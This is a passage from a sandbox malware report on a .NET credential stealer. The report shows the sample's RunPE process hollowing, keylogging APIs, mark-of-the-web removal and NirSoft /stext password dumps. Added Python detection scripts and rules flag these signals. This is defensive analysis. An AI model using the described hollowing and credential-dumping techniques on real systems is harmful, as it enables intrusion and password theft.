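    "Ra1/Ms7": ['.ctor', 'b1T', 'x5B', 'm4G', 'w6N', 'Wb3', 'g8G', 'f6J', 'Rn4', 'Aa5'],
    "Wf6/Zk3": ['.ctor', 'd6Z', 'w2G', 'j2L', 'k7K', 'At4', 'Mm8', 'Se6', 'Lg5', 'Qe9'],
}

# Constructed control set: what a non-obfuscated .NET class of similar size might expose.
PLAIN_NAMES = ['.ctor', 'Initialize', 'LoadSettings', 'SaveSettings', 'Connect',
               'Disconnect', 'SendMessage', 'ReceiveMessage', 'Dispose', 'ToString']

# Assumed thresholds for this example; the sandbox does not publish its own.
ENTROPY_THRESHOLD = 4.5      # bits per character of the concatenated names
SHORT_MIXED_THRESHOLD = 0.5  # fraction of user-defined names shaped like 'b1T'

# Two to four alphanumerics containing at least one letter and at least one digit.
_SHORT_MIXED = re.compile(r'^(?=.*[A-Za-z])(?=.*\d)[A-Za-z0-9]{2,4}$')


def shannon_entropy(text: str) -> float:
    """Shannon entropy in bits per character (0.0 for an empty string)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def concatenated_name_entropy(names) -> float:
    """The sandbox heuristic: entropy of all method names joined into one string."""
    return shannon_entropy(''.join(names))


def short_mixed_fraction(names) -> float:
    """Share of user-defined names (runtime names such as '.ctor' excluded) that look generated."""
    user = [n for n in names if not n.startswith('.')]
    if not user:
        return 0.0
    return sum(1 for n in user if _SHORT_MIXED.match(n)) / len(user)


def looks_obfuscated(names) -> bool:
    """Flag the class when either signal crosses its threshold."""
    return (concatenated_name_entropy(names) >= ENTROPY_THRESHOLD
            or short_mixed_fraction(names) >= SHORT_MIXED_THRESHOLD)


if __name__ == "__main__":
    for label, names in list(REPORTED_NAMES.items()) + [("plain control", PLAIN_NAMES)]:
        print(f"{label:14s} entropy={concatenated_name_entropy(names):.4f} "
              f"short_mixed={short_mixed_fraction(names):.2f} "
              f"obfuscated={looks_obfuscated(names)}")
```

Both reported classes score exactly 4.6875 bits per character (32 characters, 22 of them unique), the control set roughly 4.0, so on this sample the entropy signal alone separates them, but the margin is small for inputs this short; the name-shape fraction (1.0 for the obfuscated classes, 0.0 for the control) is the more robust of the two and is what a triage script should weight.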
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | File created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | File opened: C:\Users\user\Desktop\ypBoHI5G3x.exe\:Zone.Identifier (access: read attributes, delete)
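The process tree recorded earlier in this report (ypBoHI5G3x.exe drops InstallUtil.exe into the user's Temp directory, and that copy launches the .NET 2.0 vbc.exe with /stext arguments, which the VB compiler does not accept but NirSoft's mailpv and WebBrowserPassView do), together with the Explorer\Advanced Hidden registry write and the Zone.Identifier deletion just above, give a compact set of host-detection signals. The following Python is an added example written for this page, not code from the report or from the sample: it runs five rules over constructed events modelled on those lines (the event field names are the example's own, not Sysmon's, and the MSBuild path in the benign control is assumed), and the control shows the rules do not fire on a legitimate compiler invocation.

```python
import re
from pathlib import PureWindowsPath

SAMPLE = r"C:\Users\user\Desktop\ypBoHI5G3x.exe"
TEMP_INSTALLUTIL = r"C:\Users\user\AppData\Local\Temp\InstallUtil.exe"
VBC = r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"  # assumed, for the control

# Constructed events modelled on the report's process, registry and file lines.
# Field names are this example's own, not Sysmon's.
EVENTS = [
    {"type": "process", "image": SAMPLE, "parent": "", "cmdline": SAMPLE},
    {"type": "process", "image": TEMP_INSTALLUTIL, "parent": SAMPLE, "cmdline": TEMP_INSTALLUTIL},
    {"type": "process", "image": VBC, "parent": TEMP_INSTALLUTIL,
     "cmdline": VBC + r" /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'"},
    {"type": "process", "image": VBC, "parent": TEMP_INSTALLUTIL,
     "cmdline": VBC + r" /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'"},
    {"type": "registry", "image": TEMP_INSTALLUTIL,
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "value": "Hidden"},
    {"type": "file_delete", "image": SAMPLE, "path": SAMPLE + ":Zone.Identifier"},
    # Benign control: the real compiler started by a build with a response file.
    {"type": "process", "image": VBC, "parent": MSBUILD,
     "cmdline": VBC + r" /noconfig @C:\build\obj\project.rsp"},
]

# .NET Framework binaries that .NET loaders routinely copy out of %WINDIR% or hollow.
DOTNET_LOLBINS = {"installutil.exe", "vbc.exe", "csc.exe", "regasm.exe", "regsvcs.exe",
                  "msbuild.exe", "applaunch.exe", "aspnet_compiler.exe"}
# Common NirSoft "save report" switches; vbc.exe accepts none of them.
NIRSOFT_EXPORT = re.compile(r"(?i)(?:^|\s)/s(?:text|tab|comma|html|verhtml|xml)\b")
# Explorer\Advanced values that change what the user can see in the file browser.
EXPLORER_VIEW_VALUES = {"hidden", "showsuperhidden", "hidefileext"}


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _under_windows(path: str) -> bool:
    return path.lower().startswith("c:\\windows\\")


def _in_user_temp(path: str) -> bool:
    return "\\appdata\\local\\temp\\" in path.lower()


def detect(events):
    """Return (rule, evidence) pairs for every event that matches a rule."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            name = _name(ev["image"])
            # InstallUtil.exe running from %TEMP% instead of the Framework directory.
            if name in DOTNET_LOLBINS and not _under_windows(ev["image"]):
                findings.append(("dotnet_tool_outside_windows_dir", ev["image"]))
            # A Framework binary spawned by something living in the user's Temp directory.
            if name in DOTNET_LOLBINS and ev["parent"] and _in_user_temp(ev["parent"]):
                findings.append(("dotnet_tool_child_of_temp_process",
                                 ev["parent"] + " -> " + ev["image"]))
            # NirSoft export switch on any command line (the hollowed vbc.exe here).
            if NIRSOFT_EXPORT.search(ev["cmdline"]):
                findings.append(("nirsoft_export_switch", ev["cmdline"]))
        elif ev["type"] == "registry":
            if (ev["key"].lower().endswith("\\explorer\\advanced")
                    and ev["value"].lower() in EXPLORER_VIEW_VALUES):
                findings.append(("explorer_view_tampering", ev["key"] + "\\" + ev["value"]))
        elif ev["type"] == "file_delete":
            # Deleting the Zone.Identifier stream removes the mark-of-the-web.
            if ev["path"].lower().endswith(":zone.identifier"):
                findings.append(("mark_of_the_web_removed", ev["path"]))
    return findings


if __name__ == "__main__":
    for rule, evidence in detect(EVENTS):
        print(f"{rule:36s} {evidence}")
```

The report does not show the data written to the Hidden value, so the registry rule keys on the value name only; real Sysmon EventID 13 telemetry carries the data and would let you distinguish Hidden=2 (hide hidden files, the stealthy setting) from an ordinary user toggling the view.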
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 18_2_00441975 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\ypBoHI5G3x.exe | Process information set: NOOPENFILEERRORBOX (54 identical entries)
Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX (50 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Process information set: NOOPENFILEERRORBOX (5 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 180000
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeWindow / User API: threadDelayed 399
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeWindow / User API: threadDelayed 9441
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe TID: 6688Thread sleep time: -15679732462653109s >= -30000s
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe TID: 6760Thread sleep count: 399 > 30
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe TID: 6760Thread sleep count: 9441 > 30
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe TID: 6688Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 6708Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 3516Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 3588Thread sleep time: -140000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 1276Thread sleep time: -46000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 5508Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 19_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_004161B0 memset,GetSystemInfo,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeThread delayed: delay time: 30000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 120000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 140000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 180000
            Source: ypBoHI5G3x.exe, 00000001.00000002.460154199.00000000060A0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: ypBoHI5G3x.exe, 00000001.00000002.460154199.00000000060A0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: ypBoHI5G3x.exe, 00000001.00000002.460154199.00000000060A0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: ypBoHI5G3x.exe, 00000001.00000002.460154199.00000000060A0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 18_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            .NET source code references suspicious native API functionsShow sources
            Source: 12.2.InstallUtil.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 12.2.InstallUtil.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 value starts with: 4D5A
            Sample uses process hollowing technique
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 402000
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 482000
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 486000
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: A08008
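The five write addresses above are the fingerprint of a manually mapped PE: the headers go to the image base (hence the 4D5A, i.e. MZ, at 400000) and each section goes to ImageBase + VirtualAddress. As an added example that is not code from the report or from the sample, the Python below parses a PE section table and labels every remote write with the region of the image it lands in. The image it parses is constructed here, with section names and sizes chosen so that the sections begin at the reported addresses; the sample's real section layout is not given in the report.

```python
"""Map the cross-process writes reported for InstallUtil.exe onto the section
table of the image that was written. Added example, not code from the report
or the sample; the PE image below is constructed so that its section layout
mirrors the reported write addresses (the real sample's layout is not given)."""
import struct

OBSERVED_WRITES = [0x400000, 0x402000, 0x482000, 0x486000, 0xA08008]  # from the report
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SECTION_HEADER = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def build_pe32(image_base, sections):
    """Construct a minimal PE32 header (DOS stub, file header, optional header,
    section table). sections: list of (name, rva, virtual_size). Only the fields
    that parse_sections() reads carry meaningful values."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    size_of_optional = 0xE0  # PE32 optional header size
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_optional, 0x0102)
    optional = bytearray(size_of_optional)
    struct.pack_into("<H", optional, 0, PE32_MAGIC)
    # ImageBase, SectionAlignment, FileAlignment at offsets 28, 32, 36 of a PE32 optional header
    struct.pack_into("<III", optional, 28, image_base, 0x2000, 0x200)
    table = b"".join(
        struct.pack(SECTION_HEADER, name.encode().ljust(8, b"\0"),
                    vsize, rva, vsize, 0x200, 0, 0, 0, 0, 0x60000020)
        for name, rva, vsize in sections)
    return bytes(dos) + b"PE\0\0" + file_header + bytes(optional) + table


def parse_sections(image):
    """Return (image_base, [section dicts]) from a PE image, rejecting anything without MZ/PE signatures."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_header = e_lfanew + 4
    number_of_sections = struct.unpack_from("<H", image, file_header + 2)[0]
    size_of_optional = struct.unpack_from("<H", image, file_header + 16)[0]
    optional = file_header + 20
    magic = struct.unpack_from("<H", image, optional)[0]
    if magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", image, optional + 28)[0]
    elif magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", image, optional + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    sections = []
    for i in range(number_of_sections):
        name, vsize, rva = struct.unpack_from("<8sII", image, optional + size_of_optional + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "rva": rva,
                         "vsize": vsize, "va": image_base + rva})
    return image_base, sections


def classify_writes(image, writes):
    """Label each remote write address with the part of the mapped image it hits."""
    base, sections = parse_sections(image)
    labels = []
    for addr in writes:
        if addr == base:
            labels.append("PE headers")
            continue
        hit = next((s for s in sections if s["va"] <= addr < s["va"] + s["vsize"]), None)
        labels.append(hit["name"] if hit else "outside image")
    return labels


def looks_like_manual_map(image, writes):
    """RunPE-style mapping: headers and every section start are written at ImageBase + VirtualAddress."""
    base, sections = parse_sections(image)
    return base in writes and all(s["va"] in writes for s in sections)


# Constructed layout: a 32-bit image at 0x400000 whose sections begin at the reported write addresses.
SAMPLE_IMAGE = build_pe32(0x400000, [(".text", 0x2000, 0x80000),
                                     (".rsrc", 0x82000, 0x4000),
                                     (".reloc", 0x86000, 0x1000)])

if __name__ == "__main__":
    for addr, label in zip(OBSERVED_WRITES, classify_writes(SAMPLE_IMAGE, OBSERVED_WRITES)):
        print(f"{addr:#010x}  {label}")
    print("manual map:", looks_like_manual_map(SAMPLE_IMAGE, OBSERVED_WRITES))
```

Run as-is it labels 400000 as the headers, 402000, 482000 and 486000 as the three constructed sections, and A08008 as outside the image. RunPE loaders normally finish with one small write outside the image, the new ImageBase into the target's PEB (ImageBaseAddress sits at PEB+0x08 on 32-bit Windows), before resuming the main thread; a write at an address ending in 008 is consistent with that, but the report does not say what A08008 is. Against a real dump, pass the bytes that were written to the image base instead of the constructed header.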
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
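The three process creations above complete the picture: a copy of InstallUtil.exe is launched from %TEMP% (the genuine utility ships only under C:\Windows\Microsoft.NET\Framework), receives the injected PE, and in turn hollows two instances of vbc.exe that run with /stext, the switch NirSoft's password-recovery tools use to dump their results to a text file; holdermail.txt and holderwb.txt are the mail and web-browser credential dumps. The Python below, an added example rather than anything from the report, parses evidence lines in the report's run-together 'Source: <exe><event>' layout, reconstructs the injection chain and pulls out the /stext targets. The event lines are constructed from the lines above; the ATT&CK IDs and the list of Framework-directory utilities are my own labelling.

```python
"""Reconstruct the injection chain and credential-dump commands from sandbox
behaviour lines. Added example, not part of the report; the event lines below
are constructed from the report's evidence lines in its run-together
'Source: <exe><event>' format."""
import ntpath
import re

EVENT_RE = re.compile(r"^Source: (?P<src>.+?\.exe)"
                      r"(?P<kind>Memory written|Section unmapped|Process created): (?P<rest>.+)$")
DETAIL_RE = {
    "Memory written": re.compile(r"^(?P<target>.+?\.exe) base: (?P<base>[0-9A-Fa-f]+)"
                                 r"(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$"),
    "Section unmapped": re.compile(r"^(?P<target>.+?\.exe) base address: (?P<base>[0-9A-Fa-f]+)$"),
    "Process created": re.compile(r"^(?P<target>.+?\.exe) (?P<cmdline>.+)$"),
}
STEXT_RE = re.compile(r"/stext\s+['\"]?(?P<path>[^'\"]+)", re.IGNORECASE)
# .NET Framework utilities that legitimately live only under this directory (assumed allow-list).
FRAMEWORK_DIR = r"c:\windows\microsoft.net\framework"
DOTNET_UTILS = {"installutil.exe", "vbc.exe", "csc.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe"}

SAMPLE_EVENTS = [  # constructed from the report's evidence lines
    r"Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000",
    r"Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000",
    r"Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 402000",
    r"Source: C:\Users\user\Desktop\ypBoHI5G3x.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: A08008",
    r"Source: C:\Users\user\Desktop\ypBoHI5G3x.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe",
    r"Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'",
    r"Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'",
]


def parse_event(line):
    """Split one report line into source, event kind and detail fields; None if it is not an event we track."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    d = DETAIL_RE[m.group("kind")].match(m.group("rest"))
    if not d:
        return None
    f = d.groupdict()
    return {
        "src": ntpath.basename(m.group("src")),
        "kind": m.group("kind"),
        "target": ntpath.basename(f["target"]),
        "target_path": f["target"],
        "base": int(f["base"], 16) if f.get("base") else None,
        "magic": (f.get("magic") or "").upper(),
        "cmdline": f.get("cmdline") or "",
    }


def analyze(lines):
    """(tag, description) findings: PE written into another process, hollowing,
    a Framework utility started from outside its directory, and /stext dumps."""
    findings = []
    for ev in filter(None, map(parse_event, lines)):
        src, tgt = ev["src"], ev["target"]
        if ev["kind"] == "Memory written" and ev["magic"].startswith("4D5A"):
            findings.append(("pe-write", f"{src} wrote a PE header (MZ) into {tgt} at {ev['base']:#x}"))
        elif ev["kind"] == "Section unmapped":
            findings.append(("hollowing", f"{src} unmapped the image of {tgt} at {ev['base']:#x} (T1055.012)"))
        elif ev["kind"] == "Process created":
            if tgt.lower() in DOTNET_UTILS and not ev["target_path"].lower().startswith(FRAMEWORK_DIR):
                findings.append(("relocated-lolbin", f"{src} started a copy of {tgt} from {ev['target_path']}"))
            m = STEXT_RE.search(ev["cmdline"])
            if m:
                findings.append(("nirsoft-stext",
                                 f"{src} ran {tgt} /stext -> {m.group('path')} (password-recovery dump, T1555)"))
    return findings


def injection_chain(lines):
    """Follow 'wrote a PE into' and 'unmapped the image of' edges from the root process."""
    edges, targets = {}, set()
    for ev in filter(None, map(parse_event, lines)):
        hollow = ev["kind"] == "Section unmapped"
        pe_write = ev["kind"] == "Memory written" and ev["magic"].startswith("4D5A")
        if hollow or pe_write:
            edges.setdefault(ev["src"], ev["target"])
            targets.add(ev["target"])
    chain = [s for s in edges if s not in targets][:1]
    while chain and chain[-1] in edges and edges[chain[-1]] not in chain:  # cycle guard
        chain.append(edges[chain[-1]])
    return chain


def credential_dump_targets(lines):
    """Output files that NirSoft-style tools were told to write with /stext."""
    paths = []
    for ev in filter(None, map(parse_event, lines)):
        m = STEXT_RE.search(ev["cmdline"]) if ev["kind"] == "Process created" else None
        if m:
            paths.append(m.group("path"))
    return paths


if __name__ == "__main__":
    print(" -> ".join(injection_chain(SAMPLE_EVENTS)))
    for tag, text in analyze(SAMPLE_EVENTS):
        print(f"[{tag}] {text}")
    print("credential dumps:", credential_dump_targets(SAMPLE_EVENTS))
```

On the constructed events the chain comes out as ypBoHI5G3x.exe -> InstallUtil.exe -> vbc.exe, which is the same two-stage structure the report shows: the dropper maps its payload into a relocated InstallUtil.exe, and that payload hollows the Framework's own vbc.exe to host the credential-recovery code. The /stext output paths are the files to collect (and shred) during response, since they hold the recovered mail and browser passwords in clear text until the malware has read and deleted them.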
            Source: InstallUtil.exe, 0000000C.00000002.602172225.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: InstallUtil.exe, 0000000C.00000002.602172225.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: InstallUtil.exe, 0000000C.00000002.602172225.00000000015C0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
            Source: InstallUtil.exe, 0000000C.00000002.602172225.00000000015C0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Users\user\Desktop\ypBoHI5G3x.exe VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Users\user\AppData\Local\Temp\InstallUtil.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
